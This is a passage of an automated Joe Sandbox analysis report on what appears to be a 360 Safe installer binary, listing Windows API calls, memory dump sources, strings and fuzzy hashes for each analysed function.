                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00ACD9B7
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00ACD9C0
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00ACD9C9
                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00ACD9D2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ShowWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1268545403-0
                                                                                                                                                                                                                      • Opcode ID: 281b885bc2f5a2d7a979ab879209dc794192cd3bc131de208de1902552c7e537
                                                                                                                                                                                                                      • Instruction ID: 185d81325b8e53d7a1407e166b465bdc19c8c2a17e180d25e27183086d4667e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 281b885bc2f5a2d7a979ab879209dc794192cd3bc131de208de1902552c7e537
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F121F971101749AFDB217B66DC84FA7BFAEEF8135AF52053EE15602430CA322C51DE60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 6C6767E6
                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 6C676813
                                                                                                                                                                                                                      • PathRemoveFileSpecW.SHLWAPI(00000000,?,?,00000034), ref: 6C67681F
                                                                                                                                                                                                                      • CharUpperW.USER32(6C676A66,6C6D912C,?,?,00000034), ref: 6C676847
                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 6C676854
                                                                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 6C6768B4
                                                                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 6C6768CB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __wcsnicmp$CharFileH_prolog3PathRemoveSpecUpper_wcscpy_wcsncpy
                                                                                                                                                                                                                      • String ID: \DEFAULT$default\default_theme.ui
                                                                                                                                                                                                                      • API String ID: 2079684850-3981732111
                                                                                                                                                                                                                      • Opcode ID: 2f98f835849ac8b5fea084a757461442f542f99166bf125dac5fb87758780c07
                                                                                                                                                                                                                      • Instruction ID: a59a968902ff5d3f233a2f52c51ea2c0d73e93e8c1c1484c3ceb3103d353abf7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f98f835849ac8b5fea084a757461442f542f99166bf125dac5fb87758780c07
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51817071901249DFCB14DFA8C984AEEB7B5BF49314F10442AE505E7790EB30AA08CB69
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AE06B0
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,00000010), ref: 00AE06CC
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE070A
                                                                                                                                                                                                                        • Part of subcall function 00AB6DCF: _vswprintf_s.LIBCMT ref: 00AB6E02
                                                                                                                                                                                                                        • Part of subcall function 00ACD71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD74A
                                                                                                                                                                                                                        • Part of subcall function 00ACD71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD767
                                                                                                                                                                                                                        • Part of subcall function 00ACD71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00ACD77A
                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,?), ref: 00AE083D
                                                                                                                                                                                                                        • Part of subcall function 00ACEE1E: __EH_prolog3.LIBCMT ref: 00ACEE25
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE07B9
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE07FA
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?), ref: 00AE0821
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File_memset$H_prolog3Path$DeleteDirectoryErrorExistsFindFirstFullLastNameRemove_vswprintf_s
                                                                                                                                                                                                                      • String ID: %s\%s$%s\*.*
                                                                                                                                                                                                                      • API String ID: 1543874411-1665845743
                                                                                                                                                                                                                      • Opcode ID: 651e1f701079c1347dbbb31acc78079156260234d804fb7ef18b6e86354ebc0c
                                                                                                                                                                                                                      • Instruction ID: 329372aa74fbae9afca1261070cb48618c064112deb5acf46eae0ede4e931316
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 651e1f701079c1347dbbb31acc78079156260234d804fb7ef18b6e86354ebc0c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD511C7191028DAADB24EFA5CD45FEF77ACEF08704F004429B91D97142EB74A644CBA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?,00000006,0000044C), ref: 00AA7744
                                                                                                                                                                                                                        • Part of subcall function 00A9E185: GetDC.USER32(?), ref: 00A9E193
                                                                                                                                                                                                                        • Part of subcall function 00AF5546: _malloc.LIBCMT ref: 00AF5560
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: CreateCompatibleDC.GDI32(?), ref: 00AA7347
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: SelectObject.GDI32(?,?), ref: 00AA736E
                                                                                                                                                                                                                        • Part of subcall function 00AA7323: SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 00AA7387
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AA77B4
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00AA77D0
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AA780F
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000005), ref: 00AA7831
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00AA784D
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00AA7880
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000000,00000000,00000000,00000005), ref: 00AA78A3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ClientRectWindow$Item$CompatibleCreateObjectSelectViewport_malloc
                                                                                                                                                                                                                      • String ID: PNG
                                                                                                                                                                                                                      • API String ID: 3600242490-364855578
                                                                                                                                                                                                                      • Opcode ID: 5769ce6429fe2def6dfe4436894ce4a01ac6012dbea6565df1f48c5eaa3bdb1d
                                                                                                                                                                                                                      • Instruction ID: 729f1af5cfeccb838d7d09a6e030d265a082f87cac196e178d80ccc3b305c550
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5769ce6429fe2def6dfe4436894ce4a01ac6012dbea6565df1f48c5eaa3bdb1d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E51FA71900608AFDF20DFA5CD89EEEBBB9EF59700F04051EF556A72A1EB716505CB10
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD867B
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AD868C
                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86A1
                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86B2
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 00AD86C2
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00AD86C9
                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86D7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Version_memset$AddressHandleInfoModuleNativeProcSystem
                                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 675204089-192647395
                                                                                                                                                                                                                      • Opcode ID: 7f18df6af455ee8a1aa5fc9e51c9a7f9f87b290223cc4e88d8d075e775bdd2e6
                                                                                                                                                                                                                      • Instruction ID: 726de6341f350e64ba661666111f20bccd8e4777939db3de6fa209e3b140cb89
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f18df6af455ee8a1aa5fc9e51c9a7f9f87b290223cc4e88d8d075e775bdd2e6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3115E71D012189ADF20EBE5DC49BEE7BB8AB08719F004456F516E7180EF74D5098A55
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF3142
                                                                                                                                                                                                                        • Part of subcall function 00AF2050: _memset.LIBCMT ref: 00AF2085
                                                                                                                                                                                                                        • Part of subcall function 00AF2050: _memset.LIBCMT ref: 00AF212B
                                                                                                                                                                                                                        • Part of subcall function 00AF2050: _strncat.LIBCMT ref: 00AF21AF
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF31C9
                                                                                                                                                                                                                      • SHSetValueA.SHLWAPI ref: 00AF31FA
                                                                                                                                                                                                                      • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid_old,00000001,?,?), ref: 00AF3269
                                                                                                                                                                                                                      • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,00000001,?,?), ref: 00AF3298
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$Value$_strncat
                                                                                                                                                                                                                      • String ID: Software\360Safe\Liveup$mid$mid_old
                                                                                                                                                                                                                      • API String ID: 2533611499-1528303271
                                                                                                                                                                                                                      • Opcode ID: e1c029cb08031f9b2c8ebdc40b002e491ab1ad0f50b52be5557c402726536490
                                                                                                                                                                                                                      • Instruction ID: aefc22572dbe723f8b3b3411b2c09cdec899049cf09a619ee4547b1827bf839f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e1c029cb08031f9b2c8ebdc40b002e491ab1ad0f50b52be5557c402726536490
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8411732608349ABEB31CB648C95FFB77D9AF94700F14454DFA8987181EBB19A0C8792
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADA71F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADA72D
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00A8BCDE), ref: 00ADA741
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ADA754
                                                                                                                                                                                                                        • Part of subcall function 00AB12A8: _memset.LIBCMT ref: 00AB12EC
                                                                                                                                                                                                                        • Part of subcall function 00AB12A8: CoCreateGuid.OLE32(?,?,?,00000800), ref: 00AB12F8
                                                                                                                                                                                                                        • Part of subcall function 00AB12A8: _memset.LIBCMT ref: 00AB1309
                                                                                                                                                                                                                        • Part of subcall function 00AB12A8: _wcsncpy.LIBCMT ref: 00AB135F
                                                                                                                                                                                                                      • PathCombineW.SHLWAPI(?,?,?), ref: 00ADA784
                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00ADA796
                                                                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?), ref: 00ADA7A4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$Path$CombineCreateExistsFileGuidTemp_wcscat_wcsncpy
                                                                                                                                                                                                                      • String ID: .tmp
                                                                                                                                                                                                                      • API String ID: 2935203105-2986845003
                                                                                                                                                                                                                      • Opcode ID: b92b797369b753765f7aebee3c2514d23ee3e5a43162c242decfac12dfb4a502
                                                                                                                                                                                                                      • Instruction ID: 2845939bbce217da60a9179341b6162ad311a1231117a75b3af4a448fd54a77d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b92b797369b753765f7aebee3c2514d23ee3e5a43162c242decfac12dfb4a502
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C2166B690021C6BDB10EBA5DD85EEB77BCEB4C705F0004AAB319D3141EA74EA448B60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000001,Q360SafeInstallerMutex,Q360InstallerMainWnd,00B5BCC8,?,00A8BA36,Q360InstallerMainWnd,360Installer.exe,?), ref: 00ADBD68
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00ADBD75
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00ADBD85
                                                                                                                                                                                                                      • FindWindowW.USER32(Q360InstallerMainWnd,00000000), ref: 00ADBD92
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00B5BCE4,00000000), ref: 00ADBDA7
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00B5BCE4,?), ref: 00ADBDBA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$CloseCreateEnterErrorFindHandleLastLeaveMutexWindow
                                                                                                                                                                                                                      • String ID: Q360InstallerMainWnd$Q360SafeInstallerMutex
                                                                                                                                                                                                                      • API String ID: 3748036984-533925698
                                                                                                                                                                                                                      • Opcode ID: 84f5e90cd2785ecfc588aa0dd762f3d1479b0407e074f7385f5a2ba8b0af1bb7
                                                                                                                                                                                                                      • Instruction ID: 4594816b7e391c912d697cce9c439b70781c5e7d35fcc03608588947b0de8d64
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84f5e90cd2785ecfc588aa0dd762f3d1479b0407e074f7385f5a2ba8b0af1bb7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87F08C32110205EBD721DF62DD0AFAE37B9EB44B12F100429F413E3290EF70E902CA61
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00A82750: _vswprintf_s.LIBCMT ref: 00A82783
                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,00B5CDA4,?,?), ref: 00AF2492
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AF24BF
                                                                                                                                                                                                                      • _strncpy.LIBCMT ref: 00AF24FB
                                                                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00AF2531
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00AF259B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset_strncpy_vswprintf_s
                                                                                                                                                                                                                      • String ID: SCSIDISK$\\.\Scsi%d:
                                                                                                                                                                                                                      • API String ID: 170396225-2176293039
                                                                                                                                                                                                                      • Opcode ID: f0f723c75c8fe62a3c6e2f25cd479a47fe00e8b67fc86461c8a81315dc569943
                                                                                                                                                                                                                      • Instruction ID: bf0460b75326475e6385a9f9a8b7e16a100f3778695e4ce4c37519af84150e0d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0f723c75c8fe62a3c6e2f25cd479a47fe00e8b67fc86461c8a81315dc569943
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9419FB0648344AAE330DB54DD85FABB7E8EB88705F00091DB798971C1D7B9A508CB67
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 00AE0896
                                                                                                                                                                                                                        • Part of subcall function 00ADA6F2: _memset.LIBCMT ref: 00ADA71F
                                                                                                                                                                                                                        • Part of subcall function 00ADA6F2: _memset.LIBCMT ref: 00ADA72D
                                                                                                                                                                                                                        • Part of subcall function 00ADA6F2: GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00A8BCDE), ref: 00ADA741
                                                                                                                                                                                                                        • Part of subcall function 00ADA6F2: _memset.LIBCMT ref: 00ADA754
                                                                                                                                                                                                                        • Part of subcall function 00ADA6F2: PathCombineW.SHLWAPI(?,?,?), ref: 00ADA784
                                                                                                                                                                                                                        • Part of subcall function 00ADA6F2: _wcscat.LIBCMT ref: 00ADA796
                                                                                                                                                                                                                        • Part of subcall function 00ADA6F2: PathFileExistsW.SHLWAPI(?), ref: 00ADA7A4
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000010), ref: 00AE0903
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00AE092F
                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00000400,00000000,?,?,?), ref: 00AE0940
                                                                                                                                                                                                                        • Part of subcall function 00AE0691: __EH_prolog3.LIBCMT ref: 00AE06B0
                                                                                                                                                                                                                        • Part of subcall function 00AE0691: PathFileExistsW.SHLWAPI(?,00000010), ref: 00AE06CC
                                                                                                                                                                                                                        • Part of subcall function 00AE0691: _memset.LIBCMT ref: 00AE070A
                                                                                                                                                                                                                        • Part of subcall function 00AE0691: _memset.LIBCMT ref: 00AE07B9
                                                                                                                                                                                                                      • SHCreateDirectory.SHELL32(00000000,?,?,{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp,00000000,?,?,?), ref: 00AE096E
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00AE09A7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • {A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp, xrefs: 00AE0952
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_a70000_inst.jbxd
                                                                                                                                                                                                                      Similarity
